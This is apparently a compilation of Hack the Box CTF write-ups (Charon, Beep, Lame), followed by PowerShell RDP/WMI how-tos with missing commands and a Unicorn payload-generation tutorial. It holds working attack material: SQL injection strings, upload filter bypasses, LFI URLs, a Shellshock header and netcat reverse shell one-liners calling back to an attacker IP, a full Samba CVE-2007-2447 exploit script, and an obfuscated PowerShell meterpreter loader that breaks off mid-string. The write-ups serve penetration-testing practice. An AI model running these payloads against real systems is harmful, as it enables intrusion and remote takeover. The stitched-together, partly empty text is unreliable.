HTB – Charon

Hello friends!! Today we are going to solve another CTF challenge “Charon” which is available online for those who want to increase their skill in penetration testing and black box testing. Charon is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.31 so let’s begin with nmap port enumeration.

PS C:\Users\jacco> nmap -sC -sV 10.10.10.31
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-10 17:01 W. Europe Standard Time
Nmap scan report for 10.10.10.31
Host is up (0.028s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:c7:fb:a2:4b:53:1a:7a:f3:30:5e:b8:6e:ec:83:ee (RSA)
| 256 97:e0:ba:96:17:d4:a1:bb:32:24:f4:e5:15:b4:8a:ec (ECDSA)
|_ 256 e8:9e:0b:1c:e7:2d:b6:c9:68:46:7c:b3:32:ea:e9:ef (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Frozen Yogurt Shop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.97 seconds

As port 80 is running http server we open the target machine’s ip address in our browser.

We run dirbuster on port 80, which reveals a directory entitled “cmsdata/”.

We open the link, and are presented with a login page.

We don’t find anything on the login page, so we go to forgot password link.

We capture the request of the page using burpsuite, and send it to repeater.

After sending the request to repeater, we try to enumerate if the site is vulnerable to SQL-injection. As soon as we add a quote at the end of our email id we get a database error.

Now to confirm that it’s vulnerable to SQL-injection we use “-– – “to comment the query and remove the error.

Now as we know the site is vulnerable to SQL injection, we try to exploit it. First we find the number of columns, to check the number of columns we use “ORDER BY” command to find the number of columns in the table. After find the number of columns we use “UNION SELECT” command to give the output column names with the respective numbers. As UNION and union is blacklisted, we use UNion for SQL-injection.

email=puck@puckiestyle.nl’ UNion SELECT 1,2,3,4 — –

We couldn’t run any commands in columns, but when we pass a string in column 4, we successfully ran our query.

Now we know how bypass the security using string, we first find the name of the database

email=puck@puckiestyle.nl' UNion SELECT 1,2,3,concat(database(),"@puckiestyle.nl") -- -

After finding the name of the database we find the table name in the database.

email=puck@puckiestyle.nl' UNion select 1,2,3,concat(table_name, "@who.ami") FROM information_schema.tables where table_schema="supercms" limit 1,1 -- -

Enumerating the tables in the database; we find two tables, one called license and another one called operators.

After getting the names of the tables, we enumerate the columns. The license table doesn’t have any interesting columns but in the “operators” table we find a column called “__username_”.

After getting the “__username_” column we enumerate further and get a column called “__password_”.

Now we dump the column name “__username_”.

Now we dump the column name “__password_” for the username = “super_cms_adm”.

' UNion select 1,2,3,concat(__password_, "@who.ami") FROM operators limit 1,1 -- -

When we dump the “__password_” column we get a hash.  0b0689ba94f94533400f4decd87fa260 We use hashkiller.co.uk to crack the password.

Now we got the credentials for the supercms login page, super_cms_adm:tamarro.

Now login using the above credentials, we were able to get a page where there is an option for uploading image.

Now we open the link and find an upload page.

We take a look at the source page and find a base64 encoded string.

When we decode it we find a string called “testfile1”. It is possible that there is hidden field with this name.

By adding a new input field to the form named ​testfile1​ and setting the value to ​writeup.php​, it will cause the page to rename the uploaded file to the value specified.
Bypassing the image upload is trivial. Simply put ​GIF89a;​ as the first line in the file and save the file with a ​.gif​ extension, and it will pass all checks. The remainder of the file can include any PHP script.

We capture the upload request and Respons with Burp and change response & request to post create a new field and add “puck.php”.

 

Now we get the link the location of the file we just uploaded in /images/.

Before running our shell, we setup our listener using netcat, As soon as we open the link to our shell,

http://10.10.10.31/images/puck.php?puck=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 443 >/tmp/f

we get our reverse shell.

Now enumerating through the system we find an encrytpted file and a public key inside /home/decoder directory.

We download both the files into our system.

Now we decode the encrypted file using public key with the RsaCtfTool.

We use ssh to login using the credentials, decoder:nevermindthebollocks.

After logging in we find a file called user.txt, we open the file and find our first flag.

Now we find the files with SUID bit set and find a file called supershell in /usr/local/bin/ directory.

When we run the binary we find that we can run any shell command using this binary. We use this to open root.txt inside /root/ directory. When we open root.txt we find our final flag.

Author: Sayantan Bera

HTB – Beep

Hello friends!! Today we are going to solve another CTF challenge “Beep” which is available online for those who want to increase their skill in penetration testing and black box testing. Sense is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level. We are going to start a new series of hack the box beginning with Beep craft which is designed for beginners.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.7 so let’s begin with nmap port enumeration.

c:\PENTEST\NMAP>nmap -sV 10.10.10.7
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-18 11:31 W. Europe Standard Time
Nmap scan report for 10.10.10.7
Host is up (0.031s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.30 seconds

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser but didn’t get any remarkable clue for the next step.

As you can see we are redirected to the Elastix Login Portal in the image below.

Next we have used dirb tool of kali to enumerate the directories from .txt file. The command we have used is dirb /usr/share/wordlists/dirb/big.txt . After checking most of the directories, we finally decided to go for vtigercrm directory.

So next we decided to explore http://10.10.10.7/vtigercrm through browser URL and what we see is another Login Portal of vtiger CRM 5 browser. After looking at the page for some clue, we saw a version of vtiger which is vtiger CRM 5.1 in the bottom left of the WebpageAs Shown Below.

We have find this vulnerabilitie in VTiger 5.1.0
In this example, you can see a Local file Inclusion in the file sortfieldsjson.php

Try this :
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

There is an interesting directory /vtigercrm for which we can look for2
After searching I found LFI exploits for vtigerCRM, and Vtiger login which we can use to read user flag and get admin credentials.

User Flag :-3
The username is fanis4
Now using the second LFI exploit we can read the Admin credentials5
Now read lines one by one untill you find the correct password6
Username = admin
Password = jEhdIekWmdjE
Using this credential we can login to VtigerCRM dashboard as Admin7.1

Shell
GO to Settings>Company Details> click on Edit and you will notice we can upload any image in place of company logo
We have to rename our PHP payload and add ;.jpg after .php to bypass browser image file upload restriction

First Method – (NC)
Download the PHP reverse shell payload and edit the IP and PORT accordingly. then browse the file and click on save and capture the POST request on burp1314
remove ;.jpg from the file and forward the request1516
Make sure the file has been uploaded successfully17
Now browse to the file location and get the shell18

Next we decided to use burp to exploit shellshock vulnerability.

burp : https://10.10.10.7:10000/session_login.cgi
GET /session_login.cgi HTTP/1.1
Host: 10.10.10.7:10000
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.12/8081 0>&1

After executing our burp command, we have simply started our listening services using netcat command nc -lvp 8081. Once we have establish a connection with the Victim Host. We used command ls to look for files, folder in the current directory.

c:\PENTEST>nc -lvp 8081
listening on [any] 8081 ...
10.10.10.7: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.7] 60581: NO_DATA
bash: no job control in this shell
[root@beep webmin]# id
uid=0(root) gid=0(root)

The ls command which gave us the root.txt file. Whose content we would like to see by using the cat root.txt command.

Simple way to find credentials and login with ssh

After searching I found LFI exploits for vtigerCRM, and Vtiger login which we can use to read user flag and get admin credentials.

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00

I’m going to look for interesting files for the programs I know are installed and to which I have access, like Asterisk (https://www.voip-info.org/asterisk-config-files/).

Author: Jacco Straathof

 

 

HTB – Lame

Today we are going to solve another CTF challenge “Lame” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Lame lab.

Level: Beginner

Task: find user.txt and root.txt file in victim’s machine.

Let’s begin the Game!!

Since these labs are online available therefore they have static IP and IP of Lame is 10.10.10.3 so let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sV 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 20:00 W. Europe Standard Time
Nmap scan report for 10.10.10.3
Host is up (0.033s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.48 seconds
root@kali:/pwk# nmap --script smb-os-discovery.nse -p445 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 07:57 EDT
Nmap scan report for 10.10.10.3
Host is up (0.033s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-os-discovery: 
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name: 
| Workgroup: WORKGROUP\x00
|_ System time: 2019-08-17T04:59:42-04:00

Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds

From nmap results we saw samba service smbd 3.x is running in victim’s machine

CVE-2007-2447 – Samba usermap script.

https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

Usage:

$ python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
  • RHOST — The target address
  • RPORT — The target port (TCP : 139)
  • LHOST — The listen address
  • LPORT — The listen port

Installation

sudo apt install python python-pip
pip install --user pysmb
git clone https://github.com/amriunix/CVE-2007-2447.git
root@kali:~/htb/lame# python usermap.py 10.10.10.3 445 10.10.14.20 443
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
root@kali:~/htb/lame# cat usermap.py
#!/usr/bin/python
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport, lhost, lport):
        payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
        username = "/=`nohup " + payload + "`"
        conn = SMBConnection(username, "", "", "")
        try:
            conn.connect(rhost, int(rport), timeout=1)
        except:
            print '[+] Payload was sent - check netcat !'

if __name__ == '__main__':
    print('[*] CVE-2007-2447 - Samba usermap script')
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)

Done. You should receive the connection to your listener:

root@kali:~/htb/lame# nc -lvp 443
listening on [any] 443 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.3] 52321
whoami
root

Inside path: /home/makis I found user.txt file

Inside path: /root I found root.txt file

Author: Jacco Straathof

 

PowerShell – Call WMI Methods

Windows PowerShell can call WMI methods. As an example, on Windows Server 2003 and later there is a really cool WMI class named Win32_Volume. The reason I love this WMI class is because of the methods. The properties are easy to obtain by using the Get-WmiObject cmdlet. (One thing that is cool is the system property __Property_Count. This tells us there are 44 properties on the Win32_Volume WMI class.) This is seen here:

PS C:> Get-WmiObject -Class win32_volume

in spite of the fact that the Get-Member cmdlet clearly displays them as seen here:

PS C:> Get-WmiObject -Class win32_volume | Get-Member -MemberType method

you use the Get-WmiObject cmdlet to query for all instances of the Win32_Volume, and you use the pipeline to pass the objects to the Foreach-Object cmdlet. Inside the script block for the Foreach-Object cmdlet, you use the $_ automatic variable to refer to the current object on the pipeline. This allows you to call the DefragAnalysis method. This technique is seen here:

.

 

Powershell – Enabling RDP remotely

By default on a Windows Server Product Windows Remote Management (WinRM) is enabled, but Remote Desktop (RDP) is Disabled.  On workstation operating systems neither is enabled by default, so if you want to be able to accomplish the following you will need to enable WinRM on the workstations.

Enabling RDP remotely.

Method 1:  Command Line

To enable RDP with the Command Prompt, use the following steps.

  1. Launch the Command Prompt as Administrator.
  2. Type the following command:

 

Note:  Computername is the name of the computer you wish to enable RDP on.

NOTE:  Enabling RDP through the Command Prompt will not configure the Windows Firewall with the appropriate ports to allow RDP connections.

NOTE:  By default the local Administrators group will be allowed to connect with RDP.  Also the user that is currently logged in will also be allowed to connect.

To disable RDP with the Command Prompt, use the following steps.

  1. Launch the Command Prompt as Administrator.
  2. Type the following command:

 

Method 2:  Using PowerShell

To enable RDP with the PowerShell, use the following steps.

Option 1

To enable RDP:

  1. Launch PowerShell as Administrator.
  2. Type the following command and create a script block and use the Invoke-Command cmdlet:

 

You may also like:  Using PowerShell to convert to the Full Graphical Shell on a Windows Server 2012 R2 Datacenter Core Edition

NOTE:  Enabling RDP through PowerShell will not configure the Windows Firewall with the appropriate ports to allow RDP connections.

Type the following:

 

NOTE:  By default the local Administrators group will be allowed to connect with RDP.  Also the user that is currently logged in will also be allowed to connect.

To disable RDP with the PowerShell, use the following steps.

  1. Launch PowerShell as Administrator.
  2. Type the following command:

 

Option 2

To enable RDP RDP with the PowerShell, use the following steps.

  1. Launch PowerShell as Administrator.
  2. Create a PS Session with the desired target computer.
  3. Type the following command once possession is established:

 

NOTE:  Enabling RDP through PowerShell will not configure the Windows Firewall with the appropriate ports to allow RDP connections.

Type the following:

 

NOTE:  By default the local Administrators group will be allowed to connect with RDP.  Also the user that is currently logged in will also be allowed to connect.

To disable RDP RDP with the PowerShell, use the following steps.

  1. Launch PowerShell as Administrator.
  2. Create a PS Session with the desired target computer.
  3. Type the following command once possession is established:
You may also like:  How to use CSVDE Comma Separated Value Data Exchange to Import and Export users into an Active Directory Database in Windows Server 2016

 

Method 3:  Use Group Policy

If you have numerous Servers and/or Workstations that you need to enable RDP on and they are in the same Organization Unit structure in Active Directory you should enable RDP through Group Policy.

To enable RDP Using Group Policy.

  1. Launch the Group Policy Management Console (GPMC)
  2. Either edit an existing Group Policy Object (GPO) or create a new GPO.
  3. Navigate to the following GPO node:

Computer Configuration\Administrative Templates\Windows Components\Remote Desktop Services\Remote Desktop Session Host\Connections

001-connections-Remotely-Enable-and-Disable-RDP-Remote-Desktop

  1. In the Settings pane double click Allow users to connect remotely by using Remote Desktop Services.

002-allow-users-Remotely-Enable-and-Disable-RDP-Remote-Desktop

  1. Select the Enable Radial button select OK.

003-Remotely-Enable-and-Disable-RDP-Remote-Desktop

  1. Close the GPO editor and link the GPO to the appropriate Organizational Unit.

NOTE:  Enabling RDP through GPO will configure the Windows Firewall with the appropriate ports to allow RDP connections.

Note:  In all the methods demonstrated in this blog any member of the local Remote Desktop Users group will be able to connect to the target computers.

Until next time

Unicorn

Install Unicorn

With the Metasploit installation taken care of, the Unicorn GitHub repository can be cloned using git clone github.com/trustedsec/unicorn.

git clone https://github.com/trustedsec/unicorn

Cloning into 'unicorn'...
remote: Counting objects: 340, done.
remote: Total 340 (delta 0), reused 0 (delta 0), pack-reused 340
Receiving objects: 100% (340/340), 163.94 KiB | 45.00 KiB/s, done.
Resolving deltas: 100% (215/215), done.

Then, change into the new Unicorn directory using the cd command.

cd unicorn/

To view the available Unicorn options and comprehensive descriptions of each attack, use the ./unicorn.py –help argument.

./unicorn.py --help

-------------------- Magic Unicorn Attack Vector v3.1 -----------------------------

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy Magic Unicorns.

Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help

There are several interesting and effective Unicorn options. In this article, I’ll be focusing on the PowerShell and Meterpreter solution.

Generate the Payload

To create a payload with Unicorn, use the below command.

./unicorn.py windows/meterpreter/reverse_https <ATTACKER-IP-ADDRESS> <PORT>

Unicorn will use the Metasploit reverse_https module to connect to the attackers IP address using the specified port.

[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...

                                                         ,/
                                                        //
                                                      ,//
                                          ___   /|   |//
                                      `__/\_ --(/|___/-/
                                   \|\_-\___ __-_`- /-/ \.
                                  |\_-___,-\_____--/_)' ) \
                                   \ -_ /     __ \( `( __`\|
                                   `\__|      |\)\ ) /(/|
           ,._____.,            ',--//-|      \  |  '   /
          /     __. \,          / /,---|       \       /
         / /    _. \  \        `/`_/ _,'        |     |
        |  | ( (  \   |      ,/\'__/'/          |     |
        |  \  \`--, `_/_------______/           \(   )/
        | | \  \_. \,                            \___/\
        | |  \_   \  \                                 \
        \ \    \_ \   \   /                             \
         \ \  \._  \__ \_|       |                       \
          \ \___  \      \       |                        \
           \__ \__ \  \_ |       \                         |
           |  \_____ \  ____      |                        |
           | \  \__ ---' .__\     |        |               |
           \  \__ ---   /   )     |        \              /
            \   \____/ / ()(      \          `---_       /|
             \__________/(,--__    \_________.    |    ./ |
               |     \ \  `---_\--,           \   \_,./   |
               |      \  \_ ` \    /`---_______-\   \\    /
                \      \.___,`|   /              \   \\   \
                 \     |  \_ \|   \              (   |:    |
                  \    \      \    |             /  / |    ;
                   \    \      \    \          ( `_'   \  |
                    \.   \      \.   \          `__/   |  |
                      \   \       \.  \                |  |
                       \   \        \  \               (  )
                        \   |        \  |              |  |
                         |  \         \ \              I  `
                         ( __;        ( _;            ('-_';
                         |___\        \___:            \___:

aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=

Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave

Happy Magic Unicorns.

[********************************************************************************************************]

				-----POWERSHELL ATTACK INSTRUCTIONS----

Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains  all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word  doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and  scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.

Note that you will need to have a listener enabled in order to capture the attack.

[*******************************************************************************************************]
	
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.

When Unicorn is done generating the payload, two new files will be created. The first is powershell_attack.txt which can be viewed using the cat powershell_attack.txtcommand. This reveals the PowerShell code that will execute on the target Windows 10 machine and create the meterpreter connection.

cat powershell_attack.txt

powershell /w 1 /C "s''v Mx -;s''v CV e''c;s''v nU ((g''v Mx).value.toString()+(g''v CV).value.toString());powershell (g''v nU).value.toString() ('JAB0AFQAVgAgAD0AIAAnACQAYwBnACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAWABkACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYwBnACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHQAVAAgAD0AIAAwAHgAZgBjACwAMAB4AGUAOAAsADAAeAA4ADIALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgAwACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMAAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAwAGMALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADQALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwAHgAMgA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAZQAyACwAMAB4AGYAMgAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQAwACwAMAB4ADgAYgAsADAAeAA0AGEALAAwAHgAMwBjACwAMAB4ADgAYgAsADAAeAA0AGMALAAwAHgAMQAxACwAMAB4ADcAOAAsADAAeABlADMALAAwAHgANAA4ACwAMAB4ADAAMQAsADAAeABkADEALAAwAHgANQAxACwAMAB4ADgAYgAsADAAeAA1ADkALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADQAOQAsADAAeAAxADgALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANgAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQA0ACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQBmACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlAGIALAAwAHgAOABkACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgANgBlACwAMAB4ADYANQAsADAAeAA3ADQALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeABiAGIALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwAMAB4AGIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgAMwA2ACwAMAB4ADMANAAsADAAeAA1ADIALAAwAHgANgAxACwAMAB4ADcAMgAsADAAeAAzADQALAAwAHgANQA3ACwAMAB4ADQAMgAsADAAeAA3ADkALAAwAHgANQAwACwAMAB4ADcANAAsADAAeAA3ADYALAAwAHgAMwAwACwAMAB4ADUANwAsADAAeAAzADcALAAwAHgANQAxACwAMAB4ADQAZQAsADAAeAA0AGUALAAwAHgAMwA0ACwAMAB4ADUANQAsADAAeAA0ADYALAAwAHgANQAxACwAMAB4ADMAMgAsADAAeAA1ADUALAAwAHgANQAxACwAMAB4ADcAMQAsADAAeAA3ADIALAAwAHgANwA5ACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADM